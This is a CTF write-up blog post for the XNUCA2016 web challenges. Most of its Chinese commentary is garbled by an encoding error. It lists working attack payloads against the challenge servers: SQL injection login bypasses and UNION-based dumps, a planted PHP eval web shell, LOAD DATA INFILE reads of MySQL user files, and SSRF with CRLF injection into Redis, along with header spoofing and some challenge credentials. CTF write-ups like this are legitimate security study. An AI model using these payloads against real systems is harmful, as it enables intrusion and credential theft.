LoRexxar's Blog

XNUCA2016 Writeup

2016/08/01

鍛ㄦ湯涓涓汉鎵撲簡涓闄㈢殑XNUCA锛堝皬浼欎即鎵撶潃鎵撶潃灏变笉鐭ラ亾鍝噷鍘讳簡鈥︼級,鐢变簬姣旇緝寮憋紝鏈鍚庝篃鍙兘鎵撳埌20澶氬悕锛岀◢寰暣鐞嗕笅wp鍚р


Sign

Good Luck锛乫lag{X-nuca@GoodLuck!}

娌″暐鍙鐨

BaseCoding

鎻愮ず锛氳繖鏄紪鐮佷笉鏄姞瀵嗗摝!涓鑸粈涔堢紪鐮侀噷甯歌绛夊彿锛
杩欎竴涓插瓧绗﹀ソ濂囨殑鏍峰瓙锛岄噷闈細涓嶄細闅愯棌浠涔堜俊鎭紵http://question1.erangelab.com/

杩欑棰樼洰杩橀渶瑕佹彁绀衡..base64瑙d竴涓嬪氨濂戒簡

BaseInjection

鎻愮ず锛氳瘯璇曚竾鑳藉瘑鐮
涓嶇煡閬撳瘑鐮佷篃鑳界櫥褰曘http://question2.erangelab.com/

1
2
3
4
http://question2.erangelab.com/chklogin.php
username=admin'||1#&password=admin
flag{N1ce1njected}

4銆丅aseReconstruction

鎻愮ず锛氬鏁版嵁鍖呰繘琛岄噸鏋勬槸鍩烘湰鎶鑳
姝ら鐪嬩技鍜屼笂棰樹竴鏍凤紝鍏跺疄涓嶇劧銆http://question3.erangelab.com/

璇村疄璇濇垜涓嶇煡閬撴湁鍟ュ尯鍒紝payload鍜屼笂闈竴鏍枫

1
2
3
4
5
http://question3.erangelab.com/chklogin.php
username=admin'||1#&password=123
flag{Cr05sthEjava5cr1pt}

5銆丆ountingStars

鎻愮ず锛氫竴涓嶅皬蹇僊ac涔熶晶婕
No more $s counting stars. http://question4.erangelab.com/

鍏跺疄鐪嬪埌閲岃竟鐨勫娉ㄥ氨鐚滃埌鏄痬ac鐨勫浠戒簡

鍦╩ac涓瘡涓枃浠跺す涓兘瀛樺湪.DS_Store杩欎釜鏂囦欢锛屼細鏈夐儴鍒嗗綋鍓嶆枃浠跺す鐨勪俊鎭

1
http://question4.erangelab.com/.DS_Store

鎷垮崄鍏繘鍒剁紪杈戝櫒鍒嗘瀽涓嬪氨鑳藉彂鐜epLF1rEihQp5AjCUcgGry330jkFSC1C7.zip

涓嬭浇寰楀埌鐨勫眳鐒舵槸鎹熷潖鐨剒ip锛岄偅鎷栧幓linux binwalk涓璺戝氨寰楀埌浜index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$S="song";
$song="says";
$says="no";
$no="more";
$more="d0llars";
$d0llars="counting";
$counting="star";
$star="S";
echo '<div style="text-align:center">What is $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S</div>';
?>
<br>
<br>
<br>
<div style="text-align:center">
<form action="check.php" method="post">
<input type="text" name="answer" value="" />
<input type="submit" value="submit" />
</form>
<div>

娌′粈涔堝彲璇寸殑锛屾湰鍦颁竴杈撳嚭灏卞ソ浜嗭紝寰楀埌d0llars

check浼氱洿鎺ヨ烦杞紝閭d箞灏眂url涓涓嬪惂

1
2
3
ubuntu@VM-181-46-ubuntu:~$ curl 'http://question4.erangelab.com/check.php' -H 'Host: question4.erangelab.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'Content-Type: application/x-www-form-urlencoded' --data 'answer=d0llars'
flag{whyD0lIarsA9ain!}

6銆両nvisible

闅愯棌IP鏉ヤ繚鎶よ嚜宸便http://121.195.186.234

鎵撳紑涓嶇煡閬撹骞蹭粈涔堬紝鐚滄祴鏄敼xff锛岄殢渚夸竴鏀瑰氨杩囦簡鈥

7銆丯ormal_normal

鎻愮ず锛歱hpwind 鍚庡彴getxxxxx
鍙堟槸涓涓猙bs銆http://question6.erangelab.com/

鐪嬫枃绔犲彂鐜颁簡閭zhangrendao2008#126.com

闃熷弸鎵惧埌浜嗕竴涓ぞ宸ヨ¥锛屽緱鍒

1
甯愬彿zhangrendao瀵嗙爜zhang2010

杩涘叆鍚庡彴http://question6.erangelab.com/admin.php

鍦ㄧ紪杈戞ā鍧楃殑鏃跺欙紝鍙戠幇鍏朵腑鏈変竴涓嚜瀹氫箟html锛屽彲浠ョ洿鎺ュ啓浠g爜锛岄偅涔堟垜浠氨鏋勯

1
<?php echo 'test';eval($_POST['a']) ?>

缈讳簡缈绘壘鍒板閮ㄨ皟鐢ㄧ殑鎺ュ彛锛岃繖涓帴鍙f槸閫氳繃php鏂囦欢鍖呭惈瀹炵幇鐨勶紝閭d箞鎴戜滑鐨勬兂娉曞彲琛

1
http://question6.erangelab.com/index.php?m=design&c=api&token=MOw0mvL9kj&id=44&format=script

get shell

1
2
3
4
a=$username=file_get_contents('./flag-3g5WFxt7Fxp09C.txt');var_dump($username);
&csrf_token=e24bceb1c744db43
flag{n0rmal_meth0d_n0rmal_l1fe}

8銆丏Bexplorer

鎻愮ず锛歛.SELECT @@datadir 銆傘傘俶ysql/user.MYD b.user.MYD
Where is my data銆http://question7.erangelab.com/锛堣涓嶈淇敼瀵嗙爜锛侊級

杩涘幓鍙戠幇浜.db.php.swp,寰楀埌褰撳墠璐︽埛鐨勫彿鍜屽瘑鐮侊紝鐒跺悗鍙戠幇浜唒hpmyadmin

1
username:ctfdb password:ctfmysql123

閫氳繃SELECT @@datadir锛屾垜浠彲浠ュ緱鍒癿ysql鐨勮矾寰勬槸/var/lib/mysql/

閰嶅悎缃戜笂鐨勬悳绱紝鏂囦欢鐨勮矾寰勬槸/var/lib/mysql/mysql/user.MYD

杩涘幓鍙戠幇鍙互浣跨敤table q鏉ヨ鍙栨枃浠跺唴瀹规暟鎹紝浣跨敤load_file骞朵笉鑳借鍒版暟鎹(娌℃湁鎼炴槑鐧戒负浠涔)

鍚庢潵鍙戠幇浜唋oad data鍛戒护锛岃繖閲岃繕韪╀簡鍧,鍏充簬鏄惁浣跨敤local鐨

http://blog.csdn.net/youngerchen/article/details/7881678

鏈缁坧ayload锛

1
LOAD DATA INFILE '/var/lib/mysql/mysql/user.MYD' INTO TABLE q fields terminated by 'LINES' TERMINATED BY '\0'

鏈変竴涓埆鐨勮处鎴凤紝鐧婚檰杩涘幓灏辨槸flag

9銆丷otatePicture

鎻愮ず锛歶rlopen file schema
杞浆杞http://question8.erangelab.com/picrotate

棰樼洰鏄紶鍏ヤ竴寮犲浘鐗囷紝浼氳繑鍥炲掔潃鐨勫浘鐗囥

娴嬭瘯涓嶉毦鍙戠幇杩欎釜鎺ュ彛鍙互鎵弿鍐呯綉锛屽苟鏀寔浼崗璁紝閭h鏄庢垜浠彲浠ュ阀濡欏湴鏋勯爏srf鏉ヨ繘琛屾敾鍑烩

閫氳繃file鍗忚鎴戜滑鍙互璇绘枃浠讹紝浣嗘槸鍙兘璇讳竴琛屻傘傘

1
file:///etc/passwd

鐪嬫簮鐮侊紝鍙戠幇鏈夋彁绀views.py

1
file:///views.py

鎴戜滑寰楀埌

1
http://question8.erangelab.com/getredisvalue

鍙戠幇鍐呯綉6379绔彛寮鐫redis锛岄偅鎴戜滑鍙互閫氳繃Python urllib HTTP澶存敞鍏ユ紡娲鏉ユ敾鍑诲唴缃戠殑redis銆

杩欓噷鏈変袱绡囨枃绔
https://virusdefender.net/index.php/archives/749
https://security.tencent.com/index.php/blog/msg/106

浣嗘槸涓嶇煡閬撴庝箞鍐欑殑锛屽悇绉嶆姤閿欙紝杩樻湁杩囬暱鐨勫垽鏂紝寮鸿set鍊肩湅鐪嬨

1
http://127.0.0.1%0d%0aset%20c46fb8d3-6322-42ba-8919-dc4b914714db%2012345%0d%0a:6379

涓棿灏辨槸getredisvalue鎷垮埌鐨uuid锛屾煡璇㈠埛鏂板氨鎷垮埌flag浜嗐

1
flag{url0pen_1s_1nterest1ng}

10銆丄dminLogin

On the way in銆http://121.195.186.238/index.php

棣栧厛娉ㄥ叆锛岃櫧鐒朵笉鐭ラ亾鍑洪浜鸿剳瀛愭湁娌℃湁鍧戯紝浣嗘槸甯︾潃referer灏卞ソ浜

1
2
3
4
http://question9.erangelab.com/news.php?newsid=2 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 1,1%23
referer锛
http://question9.erangelab.com/index.php

娉ㄥ叆寰楀埌admin鐨勫彿瀵

1
2
3
4
5
ctfphp
>admin ; news
>id,name,pass ; id,title,content
ctfadmin

admin
administrat0r

鐒跺悗鎵惧埌robots.txt

1
2
3
4
5
6
7
8
robots.txt
# robots.txt generated at http://tool.chinaz.com/robots/
User-agent: *
Disallow:
Disallow: /xnucactfwebadmin/
Disallow: /dbconfig/
Sitemap: http://domain.com/sitemap.xml

杩欓噷宸ㄥ潙鍩嬩笅浜嗭紝杩欓噷鐨勫悗鍙版病鏈変换浣曡繑鍥烇紝鐒跺悗鍚庢潵鏀归鍗存病鏈夊叕鍛

1
2
3
4
5
http://121.195.186.238/xnucactfwebadmin/logincheck.php
浼犲叆username&password&submit锛岀劧鍚庝慨鏀箈ff涓8.8.8.8灏卞ソ浜
flag{U2NCF8yaniq5WirEE2wumYIfbrxcEiU2}

OneWayIn

How can I get in銆http://question11.erangelab.com/

1
http://question11.erangelab.com/index.php

鍋氳繖棰樼殑鏃跺欐劅瑙夎嚜宸辨槸涓櫤闅溾﹁繘鍘诲眳鐒舵病鏈夊彂鐜版簮鐮侊紝浣嗘棤鎰忎腑杩囦簡鍒ゆ柇鈥

1
2
3
0_username[]=admin
&0_pwd[]=admin鈥
&submit=Submit

杩斿洖浜嗕竴澶у爢16杩涘埗鐨勪笢瑗库.瀵艰嚧鎴戞病娉ㄦ剰鍒板叾瀹炲凡缁忓彂鐢熶簡璺宠浆鈥﹀氨涓嶈兘濂藉ソ杩斿洖涓鍋氫粈涔堝悧锛燂紵锛

1
http://question11.erangelab.com/flag_manager/index.php?file=dGVzdC50eHQ=&num=

鎴戜滑鍙互閫氳繃base64缂栫爜鏂囦欢鍚嶏紝鐒跺悗num涓琛屼竴琛岃鍐呭锛宲ython闅忎究鍐欎釜鑴氭湰灏卞ソ浜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
//
$line=isset($_GET['num'])?intval($_GET['num']):0;
if($file=='') header("location:index.php?file=dGVzdC50eHQ=&num=");
$file_list = array(
'0' =>'test.txt',
'1' =>'index.php',
);
//
if(isset($_COOKIE['role_cookie']) && $_COOKIE['role_cookie']=='flagadmin'){
$file_list[2]='flag.php';
}
//
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

鐢变簬鍑洪浜虹殑鑴戞礊澶у紑锛屽己琛屽姞闅惧害锛宖lag.php鏄湁phpjiami鍔犲瘑杩囩殑锛屼絾鏄鏂囦欢鐨勬椂鍊欐病鏈夎缃紪鐮侊紝鐒跺悗璇诲洖鏉ョ殑鏂囦欢閮戒笉瀹屾暣锛宑url涔熸槸涓嶅畬鏁达紝杩欓噷鍙湁python璇诲洖鏉ョ殑鏄畬鏁寸殑鈥

娣樺疂2.5涓瑙e氨濂戒簡

CATALOG
  1. 1. Sign
  2. 2. BaseCoding
  3. 3. BaseInjection
  4. 4. 4銆丅aseReconstruction
  5. 5. 5銆丆ountingStars
  6. 6. 6銆両nvisible
  7. 7. 7銆丯ormal_normal
  8. 8. 8銆丏Bexplorer
  9. 9. 9銆丷otatePicture
  10. 10. 10銆丄dminLogin
  11. 11. OneWayIn